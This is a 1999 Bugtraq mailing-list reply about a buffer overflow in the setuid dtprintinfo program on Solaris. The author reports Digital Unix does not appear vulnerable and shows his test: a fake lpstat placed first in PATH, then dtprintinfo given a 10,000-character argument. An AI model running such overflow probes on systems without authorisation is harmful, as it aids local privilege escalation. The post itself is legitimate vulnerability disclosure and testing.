[10514] in bugtraq

Re: Solaris2.6,2.7 dtprintinfo exploits

daemon@ATHENA.MIT.EDU (Lamont Granquist)
Tue May 11 21:20:41 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.SGI.4.05.9905101310540.13657-100000@raven.genome.washington.edu>
Date: 	Mon, 10 May 1999 13:13:29 -0700
Reply-To: Lamont Granquist <lamontg@RAVEN.GENOME.WASHINGTON.EDU>
From: Lamont Granquist <lamontg@RAVEN.GENOME.WASHINGTON.EDU>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <19990509171229.16280.qmail@www0t.netaddress.usa.net>

Digital Unix 4.0 through 4.0D w/BL11 (aka patch kit 3) does not appear to
be vulnerable to this problem.  Tested with:

% cat > lpstat
echo "system for lpprn: server.com"
^D
% chmod 755 lpstat
% setenv PATH .:$PATH
% /usr/dt/bin/dtprintinfo -p `perl -e '{ print "A" x 10000 }'`

On Mon, 10 May 1999, UNYUN@ShadowPenguin wrote:
> "dtprintinfo" is a suid program; the stack buffer can be overflowed by the
> '-p' option. I made an exploit program that can get root for the Intel
> edition of Solaris 2.6 and Solaris 2.7.



--
Lamont Granquist                       lamontg@genome.washington.edu
Dept. of Molecular Biotechnology       (206)616-5735  fax: (206)685-7344
Box 352145 / University of Washington / Seattle, WA 98195
PGP pubkey: finger lamontg@raven.genome.washington.edu | pgp -fka
